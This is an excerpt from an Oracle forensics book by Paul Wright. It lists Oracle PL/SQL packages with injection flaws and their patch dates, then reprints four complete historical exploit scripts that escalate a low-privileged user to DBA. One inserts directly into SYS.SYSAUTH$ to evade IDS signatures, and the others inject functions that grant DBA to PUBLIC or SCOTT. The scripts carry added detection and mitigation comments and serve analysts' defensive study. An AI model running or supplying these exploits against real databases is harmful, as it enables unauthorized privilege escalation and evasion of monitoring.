# PLSQL Injection and Finding Examples

Oracle Forensics tips by Paul Wright
| schema | package | Apr05 | July05 | Oct05 | Jan06 | Apr06 | Jul06 |
|---|---|---|---|---|---|---|---|
| CTXSYS | CATSEARCH | | | | fixed | | |
| CTXSYS | CTX_DOC | | | fixed | | | |
| CTXSYS | CTX_QUERY | | | fixed | | | |
| CTXSYS | DRIDDLR | fixed | | | | | |
| CTXSYS | DRILOAD | | | fixed | | | |
| CTXSYS | DRI_MOVE_CTXSYS | | | | | | |
| CTXSYS | DRVDML | | | | fixed | | |
| CTXSYS | DRVXMD | | | fixed | | | |
| DMSYS | DMP_SYS | | | | | | |
| EXFSYS | DBMS_EXPFIL | | | | | | |
| MDSYS | MD2 | | | fixed | | | |
| MDSYS | PRVT_IDX | | | fixed | | | |
| MDSYS | PRVT_SAM | | | fixed | | | |
| MDSYS | RTREE_IDX | fixed | | | | | |
| MDSYS | SDO_CATALOG | | | | | fixed | |
| MDSYS | SDO_GEOR_INT | | | | | fixed | |
| MDSYS | SDO_GEOR_UTL | | | fixed | | | |
| MDSYS | SDO_GEOM | | | fixed | | | |
| MDSYS | SDO_GEOM_TRIG_INS1 | | | | | | |
| MDSYS | SDO_LRS_TRIG_INS | | | | | fixed | |
| MDSYS | SDO_PRIDX | | | fixed | | | |
| MDSYS | SDO_SAM | | | fixed | | | |
| MDSYS | SDO_TUNE | | | fixed | | | |
| MDSYS | SDO_UTIL | | | fixed | | | |
| OLAPSYS | CWM2_OLAP_AWAWUTIL | | | fixed | | | |
| ORDSYS | ORDIMAGE | fixed | | | | | |
| ORDSYS | ORDIMGIDXMETHODS | | | | | | fixed |
| SYS | AQ_INV | | | | | fixed | |
| SYS | DBMS_APPLY_PROCESS | | | | fixed | | |
| SYS | DBMS_APPLY_ADM_INTERNAL | | | | fixed | | |
| SYS | DBMS_AQADM_SYS | | | | fixed | | |
| SYS | DBMS_CDC_DPUTIL | | | | | | |
| SYS | DBMS_CDC_IMPDP | | | | | | |
| SYS | DBMS_CDCISUBSCRIBE | | | fixed | | | |
| SYS | DBMS_CDC_SUBSCRIBE | | | fixed | | | |
| SYS | DBMS_CDC_UTILITY | | | | fixed | | |
| SYS | DBMS_DATAPUMP | | | | fixed | | |
| SYS | DBMS_DDL | | | | | | fixed |
| SYS | DBMS_DEFER_REPCAT | fixed | | | | | |
| SYS | DBMS_EXPORT_EXTENSION | | | | | fixed | |
| SYS | DBMS_FGA | | | | fixed | | |
| SYS | DBMSINTERNALREPCAT | fixed | | | | | |
| SYS | DBMS_METADATA | | | | fixed | | |
| SYS | DBMS_LOGMNRSESSION | | | | | fixed | |
| SYS | DBMS_REPCAT | fixed | | | | | |
| SYS | DBMS_REPCAT_ADMIN | | | | | | fixed |
| SYS | DBMS_REPUTIL | | | | | fixed | |
| SYS | DBMS_SNAPSHOT_UTL | | | | | fixed | |
| SYS | DBMS_STATS | | | | | | fixed |
| SYS | DBMS_SYSTEM | fixed | | | | | |
| SYS | DBMS_XRWMV | | | | | | fixed |
| SYS | DBMS_DBUPGRADE | | | | | | fixed |
| SYS | KUPF$FILE | | | fixed | | | |
| SYS | KUPM$MCP | | | | | | |
| SYS | KUPW$WORKER | | | | | | fixed |
| SYS | LT | | | | | | |
| SYS | LTUTIL | fixed | | | | | |
| SYS | OUTLN_PKG | | | | fixed | | |
| SYS | OWA_OPT_LOCK | | | | | | |
| WKSYS | WK_ACL | | | | | | |
| WKSYS | WK_ADM | | | | | | |
| XDB | DBMS_XDB | | | | | | |
| XDB | DBMS_XDBZ0 | | | | | | |
| XDB | DBMS_XMLSCHEMA | | | | fixed | | |
| XDB | DBMS_XMLSCHEMA_INT | | | | fixed | | |
Examples of Other PLSQL Injection Exploits
http://milw0rm.com/exploits/3177
--Joxean Koret
SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE.sql
-- Historical exploit listing (milw0rm 3177, credited above to Joxean Koret) against
-- SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE, reproduced verbatim so an analyst can recognise
-- the pattern. DBMS_CDC_IMPDP has no "fixed" entry in the table above.
DECLARE
SEQUENCE_OWNER VARCHAR2(200);
SEQUENCE_NAME VARCHAR2(200);
v_user_id number;
v_commands VARCHAR2(32767);
NEW_VALUE NUMBER;
BEGIN
-- Numeric id of the calling session's own user, read from USER_USERS.
SELECT user_id INTO v_user_id
FROM user_users;
-- The payload is a direct INSERT into the SYS.SYSAUTH$ base table rather than a
-- GRANT statement (the prose below explains why). The literal values 4 and 999 are
-- the exploit's own; their meaning in SYSAUTH$ is not documented on this page.
-- Detection therefore has to key on the effect, not the statement text: DML against
-- SYS.SYSAUTH$ from a non-SYS session, and role-membership rows that have no
-- matching GRANT in the audit trail.
v_commands := 'insert into sys.sysauth$ ' ||
' values' ||
'(' || v_user_id || ',4,' ||
'999,null)';
SEQUENCE_OWNER := 'TEST';
-- SEQUENCE_NAME carries the injected text. The "lockhandle=>:1" fragment suggests the
-- procedure builds a dynamic block around this parameter internally — inferred from
-- the string only, not verified here.
SEQUENCE_NAME := ''',lockhandle=>:1);' || v_commands || ';commit;
end;--';
NEW_VALUE := 1;
-- Mitigation is the vendor patch; until then, EXECUTE on SYS.DBMS_CDC_IMPDP by
-- non-administrative users is the access to review and audit.
SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE(
SEQUENCE_OWNER => SEQUENCE_OWNER,
SEQUENCE_NAME => SEQUENCE_NAME,
NEW_VALUE => NEW_VALUE
);
END;
/
This is an effectively coded exploit: it avoids the “Grant DBA” syntax, which would be picked up by a typical IDS signature, by inserting the necessary values directly into the base table. Detection of this class of exploit therefore has to rest on the effect rather than the statement text — for example, auditing DML against SYS.SYSAUTH$ and reconciling role-membership changes against approved grants.
SYS.KUPW$WORKER.MAIN found by NGS and RDS
http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_kupw$worker.html
SYS.KUPW$WORKER.MAIN.sql exploit
-- Create a function first and inject this function. The function will be executed as user SYS.
-- Helper function used by the KUPW$WORKER.MAIN exploit (found by NGS and RDS, see the
-- link above). AUTHID CURRENT_USER makes it an invoker's-rights function, and the page
-- states the injection causes it to run as SYS; PRAGMA AUTONOMOUS_TRANSACTION lets it
-- COMMIT independently of the caller's transaction.
CREATE OR REPLACE FUNCTION F return number
authid current_user as
pragma autonomous_transaction;
BEGIN
-- Detection: with GRANT/DDL auditing enabled this shows up in the audit trail, and
-- afterwards as a PUBLIC row for the DBA role in DBA_ROLE_PRIVS. KUPW$WORKER is listed
-- as fixed in the table above.
EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC';
COMMIT;
RETURN 1;
END;
/
-- Inject the function in the vulnerable procedure
-- Injection step: the second argument is the attacker-controlled string. The "d.f"
-- reference presumably names the function F created above under its owner's schema
-- (the owner is not shown on this page — confirm against the original write-up).
exec sys.kupw$WORKER.main('x','YY'' and 1=d.f -- r6');
SYS.DBMS_METADATA.GET_DDL
SYS.DBMS_METADATA.GET_DDL.sql PLSQL Exploit
--For 9iR2:
-- Helper function for the DBMS_METADATA.GET_DDL example (the comment above says 9iR2).
-- Same shape as the KUPW$WORKER helper: invoker's rights plus an autonomous
-- transaction wrapping a GRANT; here the grant target is SCOTT rather than PUBLIC.
-- NOTE(review): the SQL*Plus terminator "/" sits on the END line below, which looks
-- like a line-wrap artefact of the extraction; it is normally on a line by itself.
CREATE OR REPLACE FUNCTION ATTACKER_FUNC return varchar2 authid
current_user as pragma autonomous_transaction;
-- Detection: audited GRANT DDL, and an unexpected DBA row for SCOTT in DBA_ROLE_PRIVS.
BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN '';
END; /
-- Injection point: the first argument embeds a call to SCOTT.ATTACKER_FUNC inside the
-- quoted value, so the function presumably runs during GET_DDL's own SQL execution in
-- the package owner's context (the page only states this explicitly for KUPW$WORKER).
-- DBMS_METADATA is listed as fixed in the table above; EXECUTE on SYS.DBMS_METADATA by
-- low-privileged users is the access to review.
SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACKER_FUNC()||''','')
FROM dual; /
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION
Esteban Martinez Fayo of Argeniss
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION.sql Exploit
-- Helper function for the DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION example (credited
-- above to Esteban Martinez Fayo of Argeniss). Identical in intent to the GET_DDL
-- helper: invoker's rights plus an autonomous transaction wrapping a GRANT to SCOTT.
CREATE OR REPLACE FUNCTION
ATTACKER_FUNC return varchar2 authid current_user as pragma
autonomous_transaction;
-- Detection: audited GRANT DDL, and an unexpected DBA row for SCOTT in DBA_ROLE_PRIVS.
BEGIN EXECUTE IMMEDIATE 'GRANT DBA
TO SCOTT';
COMMIT;
RETURN '';
END;
/
-- Injection point, same construction as the GET_DDL example: the attacker's function
-- is embedded in the quoted first argument. DBMS_CDC_SUBSCRIBE is listed as fixed in
-- the table above; EXECUTE on it by non-administrative users is the access to review.
SELECT
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||SCOTT.ATTACKER_FUNC()||''','')
FROM dual;
/
The purpose of this book is not to publish exploits; it is to aid the analyst in ascertaining vulnerability to a forensic level of accuracy. However, it is crucial to know what an exploit looks like if we are to secure our databases effectively.
This is an excerpt from the book "Oracle Forensics: Oracle Security Best Practices", by Paul M. Wright, the father of Oracle Forensics.